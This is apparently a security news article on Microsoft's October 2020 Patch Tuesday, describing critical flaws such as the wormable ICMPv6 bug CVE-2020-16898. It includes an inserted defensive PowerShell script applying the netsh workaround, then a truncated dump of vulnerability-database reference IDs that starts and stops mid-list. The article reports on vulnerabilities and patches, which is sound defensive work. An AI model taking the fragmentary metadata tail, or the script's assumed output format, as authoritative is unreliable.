Microsoft has pushed out fixes for 87 security vulnerabilities in October – 11 of them critical – and one of those is potentially wormable.
There are also six bugs that were previously unpatched but publicly disclosed, which could give cybercriminals a leg up — and in fact at least one public exploit is already circulating for this group.
This month’s Patch Tuesday overall includes fixes for bugs in Microsoft Windows, Office and Office Services and Web Apps, Azure Functions, Open Source Software, Exchange Server, Visual Studio, .NET Framework, Microsoft Dynamics, and the Windows Codecs Library.
A full 75 are listed as important, and just one is listed as moderate in severity. None are listed as being under active attack, but the group does include six issues that were known but unpatched before this month’s regularly scheduled updates.
“As usual, whenever possible, it’s better to prioritize updates against the Windows operating system,” Richard Tsang, senior software engineer at Rapid7, told Threatpost. “Coming in at 53 of the 87 vulnerabilities, patching the OS knocks out 60 percent of the vulnerabilities listed, along with over half of the critical RCE vulnerabilities resolved today.”
## **11 Critical Bugs**
One of the most notable critical bugs, according to researchers, is a remote code-execution (RCE) problem in the TCP/IP stack. That issue ([CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>)) allows attackers to execute arbitrary code with elevated privileges using a specially crafted ICMPv6 router advertisement.
Microsoft gives this bug its highest exploitability rating, meaning attacks in the wild are extremely likely – and as such, it carries a severity rating of 9.8 out of 10 on the CVSS vulnerability scale. True to the season, it could be an administrator’s horror show.
“If you’re running an IPv6 network, you know that filtering router advertisements is not a practical workaround,” said Dustin Childs, researcher at Trend Micro’s Zero-Day Initiative (ZDI), in his [Patch Tuesday analysis](<https://www.thezdi.com/blog/2020/10/13/the-october-2020-security-update-review>). “You should definitely test and deploy this patch as soon as possible.”
Bharat Jogi, senior manager of vulnerability and threat research at Qualys, said that an exploit for the bug could be self-propagating, worming through infrastructure without user interaction.
“An attacker can exploit this vulnerability without any authentication, and it is potentially wormable,” he said. “We expect a proof-of-concept (PoC) for this exploit would be dropped soon, and we highly encourage everyone to fix this vulnerability as soon as possible.”
Threatpost has reached out for more technical details on the wormable aspect of the bug.
“Luckily, if immediate patching isn’t viable due to reboot scheduling, Microsoft provides [PowerShell-based commands](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16898#ID0EUGAC>) to disable ICMPv6 RDNSS on affected operating systems,” said Tsang. “The PowerShell command `netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable` does not require a reboot to take effect.”
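The interim workaround above is applied per interface, so on a multi-homed host it is easy to miss one. The following script is an added example (not code from the Threatpost article or from Microsoft's advisory) that applies the advisory's netsh command to every IPv6 interface and then reads the setting back to confirm it took effect; it assumes an elevated PowerShell session on a supported Windows build and that netsh reports the setting on a line containing "RA Based DNS Config".

```powershell
#Requires -RunAsAdministrator
# Added example, not from the article or the advisory: apply the CVE-2020-16898
# workaround (disable RA-based DNS configuration, RFC 6106 RDNSS) on every IPv6
# interface and verify the resulting state. No reboot is needed for it to apply.

$results = foreach ($iface in Get-NetIPInterface -AddressFamily IPv6) {
    $idx = $iface.InterfaceIndex

    # The netsh command quoted from the advisory, run against this interface.
    netsh interface ipv6 set interface $idx rabaseddnsconfig=disable | Out-Null

    # Verify: netsh's "show interface" output carries a line such as
    # "RA Based DNS Config (RFC 6106) : disabled" once the change is in place
    # (assumed output format; -match is case-insensitive in PowerShell).
    $line = netsh interface ipv6 show interface $idx |
            Select-String 'RA Based DNS Config' |
            Select-Object -First 1

    [pscustomobject]@{
        InterfaceIndex = $idx
        Alias          = $iface.InterfaceAlias
        RdnssDisabled  = ($null -ne $line) -and ($line.Line -match 'disabled')
    }
}

$results | Format-Table -AutoSize

# Flag any interface where the setting could not be confirmed, so it is not
# silently left exposed until the patch is deployed.
$results | Where-Object { -not $_.RdnssDisabled } | ForEach-Object {
    Write-Warning "RDNSS not confirmed disabled on interface $($_.InterfaceIndex) ($($_.Alias))"
}
```

Re-run the script after patching to confirm the state, and revert with `rabaseddnsconfig=enable` once the update is installed if RA-based DNS configuration is needed.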
Another of the critical flaws is an RCE bug in Microsoft Outlook ([CVE-2020-16947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947>)). The bug can be triggered by sending a specially crafted email to a target; and because the Preview Pane is an attack vector, victims don’t need to open the mail to be infected (ZDI already has a proof-of-concept for this). It can also be used in a web-based attack by convincing users to visit a malicious URL hosting triggering content.
“The specific flaw exists within the parsing of HTML content in an email. The issue results from the lack of proper validation of the length of user-supplied data before copying it to a fixed-length heap-based buffer,” according to Childs. That bug is rated 8.1 on the CVSS scale.
A critical Windows Hyper-V RCE bug ([CVE-2020-16891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16891>), 8.8 on the CVSS scale) meanwhile allows an attacker to run a specially crafted program on an affected guest OS to execute arbitrary code on the host OS.
Other critical problems impact the Windows Camera Codec ([CVE-2020-16967](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16967>) and [CVE-2020-16968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16968>), both 7.8 on the CVSS scale). Both result from the lack of proper validation of user-supplied data, which can lead to a write past the end of an allocated buffer.
“If the current user is logged on with administrative user rights, an attacker could take control of the affected system,” according to Microsoft. “An attacker could then install programs; view, change or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.”
Two other critical flaws are RCE problems in SharePoint Server ([CVE-2020-16951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951>) and [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>), both 8.6 on the CVSS scale). Both stem from a gap in checking the source markup of an application package. Upon successful exploitation, the attacker could run arbitrary code in the context of the SharePoint application pool or server farm account.
“In both cases, the attacker would need to upload a specially crafted SharePoint application package to an affected version of SharePoint to get arbitrary code execution,” explained Childs. “This can be accomplished by an unprivileged SharePoint user if the server’s configuration allows it.”
Tsang added that PoCs are “starting to flow out in the wild, so bringing a closure to this pair of critical remote code execution vulnerabilities is a must.”
The remaining critical bugs are RCE issues in Media Foundation Library ([CVE-2020-16915](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16915>), rating 7.8); the Base3D rendering engine ([CVE-2020-17003](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17003>), rating 7.8); Graphics components ([CVE-2020-16923](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16923>), rating 7.8); and the Windows Graphics Device Interface (GDI) ([CVE-2020-16911](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16911>), rating 8.8).
Regarding the latter, the vulnerability exists in the way GDI handles objects in memory, according to Allan Liska, senior security architect at Recorded Future.
“Successful exploitation could allow an attacker to gain control of the infected system with the same administrative privileges as the victim,” he said, via email. “This vulnerability could be exploited by either tricking a victim into visiting a compromised website with a specially crafted document or opening a specially crafted document via a phishing attack.”
Tsang added, “A mitigating factor here is that users with fewer privileges on the system could be less impacted, but still emphasizes the importance of good security hygiene as exploitation requires convincing a user to open a specially-crafted file or to view attacker-controlled content. Unlike CVE-2020-16898, however, this vulnerability affects all supported versions of Windows OS, which may suggest affecting unsupported/earlier versions of Windows as well.”
## **6 Publicly Known Bugs**
There are also a half-dozen vulnerabilities that have been unpatched until this month, but which were publicly known.
“Public disclosure could mean a couple things,” Todd Schell, senior product manager of security at Ivanti told Threatpost. “It could be that a demonstration of exploit was performed at an event or by a researcher. It could also mean that a PoC code has been made available.”
When it comes to these publicly known bugs, a Windows Error Reporting (WER) elevation-of-privilege issue (CVE-2020-16909) stands out, according to Childs, given that bugs in the WER component [were recently reported as being used in the wild](<https://threatpost.com/apt-attack-malware-windows-error-reporting/159861/>) in fileless attacks.
[Image: The six publicly disclosed bugs. Source: Trend Micro’s ZDI.]
As for the others, two are EoP bugs, in the Windows Setup component and the Windows Storage VSP Driver; two are information-disclosure problems in the kernel; and one is an information-disclosure issue in .NET Framework.
“These info-disclosure bugs leak the contents of kernel memory but do not expose any personally identifiable information,” Childs said.
One of the info-disclosure bugs, [CVE-2020-16938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16938>), now has a PoC exploit that was [dropped on Twitter](<https://twitter.com/jonasLyk/status/1316104870987010048>) on Tuesday, by @jonasLyk. He claimed that a “recent update changed the permissions on partitions and volume device objects, granting everybody read access. This means that by opening the device directly you can read the raw data without any [privileges].”
With exploits emerging already, Schell pointed out that “a public disclosure does mean that threat actors have advanced warning of a vulnerability and this gives them an advantage.” In fact, the [mean time to exploit a vulnerability from the moment of its disclosure is 22 days](<https://www.rand.org/content/dam/rand/pubs/research_reports/RR1700/RR1751/RAND_RR1751.pdf>), according to a research study from the RAND Institute.
Overall, the lighter patch load of 87 fixes is a significant departure from the 110+ patches the software giant has released every month since March.
“Security teams are still reeling from efforts around reducing exposure to CVE-2020-1472 (Zerologon), and today’s Patch Tuesday thankfully brings a slightly lightened load of vulnerabilities compared to the previous seven months, with no vulnerabilities currently known to be exploited in the wild,” Jonathan Cran, head of research at Kenna Security, told Threatpost. “That said, several of the vulnerabilities in today’s update should be treated with a priority due to their usefulness to attackers [the critical bugs in the Win10 IPv6 stack, Outlook and Hyper-V]. These vulnerabilities all fall into the ‘patch quickly or monitor closely’ bucket.”
Also, some products were notably absent from the fixes list.
“There are a couple of interesting things this month,” Schell told Threatpost. “There are no browser vulnerabilities being resolved. At the time of release, Microsoft did not have any CVEs reported against IE or Edge and no listing of the browsers as affected products this month. Not sure I remember the last time that has happened.”
Patch Tuesday rolls out this month as Microsoft launches the preview of [its new update guide](<https://threatpost.com/microsoft-overhauls-security-update-guide/159449/>).
“It has provided a few nice improvements,” Schell said. “Quick access to more of the risk-focused information can be found in [the vulnerabilities view](<https://msrc.microsoft.com/update-guide/vulnerability>). Columns like ‘Exploited’ and ‘Publicly Disclosed’ allow you to sort and view quickly if there are high-risk items.”
"KB4486677", "KB4486694", "KB4601315", "KB4601318", "KB4601319", "KB4601345", "KB4601347", "KB4601348", "KB4601349", "KB4601357", "KB4601363", "KB4601384"]}, {"type": "msrc", "idList": ["MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09"]}, {"type": "mssecure", "idList": ["MSSECURE:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-1585.NASL", "ALA_ALAS-2021-1469.NASL", "ALMA_LINUX_ALSA-2021-1647.NASL", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2020-5439.NASL", "DEBIAN_DLA-2463.NASL", "EULEROS_SA-2020-2171.NASL", "EULEROS_SA-2020-2181.NASL", "EULEROS_SA-2020-2299.NASL", "EULEROS_SA-2020-2396.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "EULEROS_SA-2021-1517.NASL", "EULEROS_SA-2021-1533.NASL", "EULEROS_SA-2021-1625.NASL", "EULEROS_SA-2021-1635.NASL", "EULEROS_SA-2021-2168.NASL", "FEDORA_2020-0BE2776ED3.NASL", "FEDORA_2020-77C15664B0.NASL", "FEDORA_2020-A1D139381A.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "GENTOO_GLSA-202012-24.NASL", "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "NEWSTART_CGSL_NS-SA-2021-0024_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2021-0167_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2022-0058_SAMBA.NASL", "OPENSUSE-2020-1513.NASL", "OPENSUSE-2020-1526.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "ORACLELINUX_ELSA-2021-1647.NASL", "REDHAT-RHSA-2020-5439.NASL", "REDHAT-RHSA-2021-1647.NASL", "REDHAT-RHSA-2021-3723.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS20_OCT_3D_VIEWER.NASL", "SMB_NT_MS20_OCT_4577668.NASL", "SMB_NT_MS20_OCT_4577671.NASL", "SMB_NT_MS20_OCT_4579311.NASL", "SMB_NT_MS20_OCT_4580327.NASL", "SMB_NT_MS20_OCT_4580328.NASL", "SMB_NT_MS20_OCT_4580330.NASL", "SMB_NT_MS20_OCT_4580345.NASL", "SMB_NT_MS20_OCT_4580346.NASL", "SMB_NT_MS20_OCT_4580347.NASL", "SMB_NT_MS20_OCT_4580378.NASL", 
"SMB_NT_MS20_OCT_4580382.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL", "SMB_NT_MS20_OCT_OUTLOOK.NASL", "SMB_NT_MS21_FEB_4601347.NASL", "SONICWALL_SNWLID-2020-0010.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "UBUNTU_USN-4510-1.NASL", "UBUNTU_USN-4559-1.NASL", "WEB_APPLICATION_SCANNING_112737", "WEB_APPLICATION_SCANNING_112738", "WEB_APPLICATION_SCANNING_112739", "WEB_APPLICATION_SCANNING_112740"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439", "ELSA-2021-1647"]}, {"type": "osv", "idList": ["OSV:DLA-2463-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159612", "PACKETSTORM:160127"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "ptsecurity", "idList": ["PT-2020-29"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:7799BDEDC6C56E9CAE494D08410C252D", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:0E497787F9B42FC1D11439220E6A9D3F", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", 
"RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:E36C557104ECB6E144C21C3C499B0492", "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"]}, {"type": "redhat", "idList": ["RHSA-2020:5439", "RHSA-2021:1647", "RHSA-2021:3723"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472"]}, {"type": "securelist", "idList": ["SECURELIST:100DB957ACFED2B9DC6D860183E5B88F", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:847981DCB9E90C51F963EE1727E40915", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08"]}, {"type": "srcincite", "idList": ["SRC-2020-0022", "SRC-2020-0024"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1", "OPENSUSE-SU-2020:1526-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A"]}, {"type": "thn", "idList": ["THN:0A61A90DD0F88453854B73FE249BC379", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:A30AE10A13D33189456EB192DDF2B8C2", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:C3154ED3ABE28924B7CC42873DED19BB", "THN:D6FED8C7635FDB50C271368C9373B439", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:F4928090525451C50A1B016ED3B0650F", "THN:F53D18B9EB0F8CD70C9289288AC9E2E1"]}, {"type": "threatpost", "idList": ["THREATPOST:033645C929899D29D91092278D188D8E", "THREATPOST:0A238D67F7286BA41103801846210F7A", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:0EAD358006302B8EB3637C22334E13DC", "THREATPOST:0ED2C20BB1821A77810AB2D29BB6A6A5", "THREATPOST:130EDA07603C228BE562B445904A297A", "THREATPOST:1322630273A25CA5A68246679553E2B8", "THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:158524EA6F79769C547CC6A407EF6E78", "THREATPOST:1973BA4B294E79D107940CF5DA67CB9A", 
"THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:2F655C93B7912A7C776E1DC1D39822D0", "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:32F51D65448FD7613BA513B6F8239EE9", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:39625C47309704502299C3CF93814CFA", "THREATPOST:3A306ADED5369A8AA74DD95614F98FBD", "THREATPOST:3F81254E133ABD9AE724F95349C0040A", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:49EFC5B6CFCA04F105A001AAFED52548", "THREATPOST:4A02969D23A7147DEF39EFDE11D3094E", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:51EF909F29E9FE8B04A35A1E24E52C08", "THREATPOST:5293ED4A454EC6487F8AA9DB9A0FF180", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:58C865E4F2AA34CD62938A2E6BBFDE44", "THREATPOST:597800CEAF4F4832B357C491661792B5", "THREATPOST:5C0EFAEECFC2925A0D89538F79EE561A", "THREATPOST:5CB5F29FA05D52DEEC4D54AA46EB9235", "THREATPOST:60965118E4D29480FABA6D1722EFA4AA", "THREATPOST:639CADC540E81321048EB418C2EC7586", "THREATPOST:659B01C0432DD93535B729D005CCA9E8", "THREATPOST:6A1329627DFBA3501BA187A580E968D5", "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB", "THREATPOST:6F4D076CD2B99D42353A5547FDBB288C", "THREATPOST:701953AF963ADACDD2280B3D18B58493", "THREATPOST:70ADDCF33645E0424EA606C8912FDDCF", "THREATPOST:718E4F36F0096BBE66CB2FAE28048810", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:7229E2AD26BA4F6395ACBFE184C783EF", "THREATPOST:73F48A70A1B3DDD9B987BA26009E6630", "THREATPOST:7BA8370AF04822DCF1A03C685AF16604", "THREATPOST:7FC78356FBFC440CD45BB996E2A8A5C8", "THREATPOST:815A85AC4471792F2F220EAD5DD49460", "THREATPOST:85A0FA8DF1A997221A2F71AF5B8CC3E8", "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "THREATPOST:88ED6BF6458FC657DACB44E3795710C1", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", 
"THREATPOST:8A8E859062970130E3F91D160F03325C", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8DA5404E0E8179BD2E87B8F221395859", "THREATPOST:8E52FA6620F4FFE6ED3A412867239F2B", "THREATPOST:8F6E27B46891F0167D7799A73F1A9380", "THREATPOST:9234A5FE45618A7D601CF00D4A75748E", "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:96E2DCEDA40DFA7D30B6AB9F86D38FEB", "THREATPOST:97C27999457834C42771A5FB9EEAD852", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:9AADE8E4BD604BE3415C6DD56ECA3640", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:A43BC2773FE4FB67EB7B8F584F137132", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A5D4FD6C2281AE395B821A8D0EB5736D", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:ABBA6B89522F29EE1F01F3D010F46FC0", "THREATPOST:AD7CBD7ADE9D9F9DE3BBDB1AE8A6F81D", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AF18435BD7544B43152D5D3E8B97CE30", "THREATPOST:B18EFE773F83789508C61F27321B9FAA", "THREATPOST:B313D27399CB1B0B0727DC338B57B95E", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B5964CC2880F7E4AFF1E9C5DEEE5B287", "THREATPOST:B664DFB1B57D66837AE025D5CD687F70", "THREATPOST:B6946D18AC7359473DB43051174C70B0", "THREATPOST:B9A8F6E46618F5253194C38A1808CF9C", "THREATPOST:B9E2C282835BF652ABC49052C859DBCC", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:BED35CFCFED307909DB60602551982A6", "THREATPOST:C22F323F8CA203A50435F11517317613", "THREATPOST:C249ACD6B53EBF0A2F149F42F6D9873D", "THREATPOST:C4650E22534F775312B3885DAA306DDA", "THREATPOST:C4D1E87CE4261EC62077E4F157643132", "THREATPOST:C51D2F2366676BB018956D93916AC33E", "THREATPOST:C7B22E2E8B3AB6D2FD4DA4F6C33951CF", 
"THREATPOST:C9AB0B1EBE1A344DC385414BD784DFC7", "THREATPOST:CA33E204EC4B2286ECCDD9C58B908175", "THREATPOST:CAAA6F4ECA9D8F91250F10C27A869E23", "THREATPOST:CEFF4DB144B2E463CD3FB46A8A93EEF8", "THREATPOST:CF4E8B0929D149A75E7512A74E569009", "THREATPOST:D0762E9D61E59AD261E8F24340AE261C", "THREATPOST:D2BB5A9DDB021A7E256A4E0D8A6BDA55", "THREATPOST:D3F7F2434B9347169B642A60BEC9FF02", "THREATPOST:D4F89B42660582EFECA648A891470AD4", "THREATPOST:D819574E836325FD37CCA2E8B9E979A1", "THREATPOST:DB4FE6FEC73D65579261FF6697220766", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DF1387D21FA2EBF23BBB67081E7B75EC", "THREATPOST:DF35DF449CB3A8F93C405B227A00E117", "THREATPOST:DFC75A06F449D25EF03338C5D80C705C", "THREATPOST:E54A6B6E04C21B79F588B156DC5704F8", "THREATPOST:E95F180BE3CA693890795666169A5F04", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:EBE40A69B865E25E52FF87060EDD790F", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:EFC1ED7D43C4F52F844E131EAE00990F", "THREATPOST:EFC814A6564326F98824AC875F125E0D", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:F18124E38523CE6CF73ACDCF7DBF78BC", "THREATPOST:F1B41E6C07BCAD79CFBB003B91DF332F", "THREATPOST:F2B495A97075920EEF1C7328AE80CC7B", "THREATPOST:F334DD851AFA845C7A29CB75F55E8128", "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB", "THREATPOST:FB79AC722601BBB92388FFC66EE0EAF4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472"]}, {"type": "veracode", "idList": ["VERACODE:27548"]}, {"type": "zdi", "idList": ["ZDI-20-1245", "ZDI-20-1246", "ZDI-20-1249", "ZDI-20-1250", "ZDI-20-1257", "ZDI-20-1258"]}, {"type": "zdt", "idList": ["1337DAY-ID-35071", "1337DAY-ID-35274"]}]}, "score": {"value": -0.4, "vector": "NONE"}, "backreferences": {"references": 
[{"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS2-2021-1585"]}, {"type": "archlinux", "idList": ["ASA-202009-17"]}, {"type": "attackerkb", "idList": ["AKB:1C1E9FA5-A4DB-4CE8-8770-2431CE166358", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:9B59AD71-CB71-4C61-A639-5DC0E582DDC2", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B"]}, {"type": "avleonov", "idList": ["AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:A526657711947788A54505B0330C16A0"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:490028"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0872", "CPAI-2020-0901", "CPAI-2020-1004", "CPAI-2020-1043", "CPAI-2020-1095", "CPAI-2020-1367"]}, {"type": "cisa", "idList": ["CISA:2B970469D89016F563E142BE209443D8", "CISA:348CDAC76EADE8EE621368419146CDE1", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:48962A3B37B032DCF622B3E3135B8A1A", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB"]}, {"type": "cve", "idList": ["CVE-2020-1472", "CVE-2020-16891", "CVE-2020-16898", "CVE-2020-16909", "CVE-2020-16911", "CVE-2020-16915", "CVE-2020-16923", "CVE-2020-16938", "CVE-2020-16947", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-16967", "CVE-2020-16968", "CVE-2020-17003", "CVE-2020-5135"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2463-1:1381E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-1472"]}, {"type": "exploitdb", "idList": ["EDB-ID:49071"]}, {"type": "f5", "idList": ["F5:K93951507"]}, {"type": "fedora", "idList": ["FEDORA:38D8230C58CD", "FEDORA:4A64830CFCDC", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": 
["FIREEYE:D64714BFF80E34308579150D4C839557"]}, {"type": "freebsd", "idList": ["24ACE516-FAD7-11EA-8D8C-005056A311D1"]}, {"type": "gentoo", "idList": ["GLSA-202012-24"]}, {"type": "githubexploit", "idList": ["02065E08-7493-5F8F-BA4C-860931D3D2D3", "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "08C67247-7D33-5943-A7AF-2E9C8989658E", "0CFAB531-412C-57A0-BD9E-EF072620C078", "12E44744-1AF0-523A-ACA2-593B4D33E014", "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "20466D13-6C5B-5326-9C8B-160E9BE37195", "2255B39F-1B91-56F4-A323-8704808620D3", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "3F400483-1F7E-5BE5-8612-4D55D450D553", "49EC151F-12F0-59CF-960C-25BD54F46680", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "59F9AB6D-E4E2-5EEF-9F2E-2337B7C8D4B9", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "60DC34D5-16D7-5E65-8C51-B36123C2EF39", 